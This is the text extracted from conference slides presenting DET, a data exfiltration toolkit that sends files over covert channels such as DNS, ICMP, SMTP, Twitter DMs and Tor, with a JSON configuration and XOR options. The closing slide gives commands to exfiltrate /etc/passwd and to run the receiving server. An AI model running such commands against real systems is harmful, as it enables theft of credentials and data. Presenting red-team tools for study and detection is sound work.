Introducing DET
(Data Exfiltration Toolkit)
Paul Amar - BSides Ljubjana - 09/03/2016
100
General Approach
TCP� DNS� HTTP� ICMP� SMTP
General Approach
TCP� DNS� HTTP� ICMP� SMTP
General Approach
TCP� DNS� HTTP� ICMP� SMTP
General Approach
TCP� DNS� HTTP� ICMP� SMTP
General Approach
TCP� DNS� HTTP� ICMP� SMTP
General Approach
TCP� DNS� HTTP� ICMP� SMTP
HammerToss (July 2015)
What’s available today?
What’s available today?
And many more.. created almost everyday.
Not kidding.
Current state
TCP� DNS� HTTP� ICMP� Twitter DMs� SMTP (eg. Gmail)
Introducing DET
Configuration file (JSON format)
File to exfiltrate
Folder to exfiltrate / multi-threaded
Plugin(s) to use
Plugin(s) to exclude
Server mode
Configuration file
List all your plugins and their configuration
Configuration file
Each plugin has its own configuration �(username, pwd, …)
Configuration file
Additional configuration (XOR Key, Sleeping time, …)
Let’s dig a bit (Client-side)
“Registration” phase 1/2
“Registration” phase 2/2
Sending the data 1/2
Sending the data 2/2
“End” phase 1/2
“End” phase 2/2
So in few words..
But wait! There’s moar.
Additional plugins (Tor Integration) 1/2
Additional plugins (Tor Integration) 2/2
“Experimental” plugins
What’s next
Installation
Get/install it:
Client side:� - python det.py -f /etc/passwd -c ./config.json (or PS scripts)�Server side:� - python det.py -L -c ./config.json
sys.exit(0)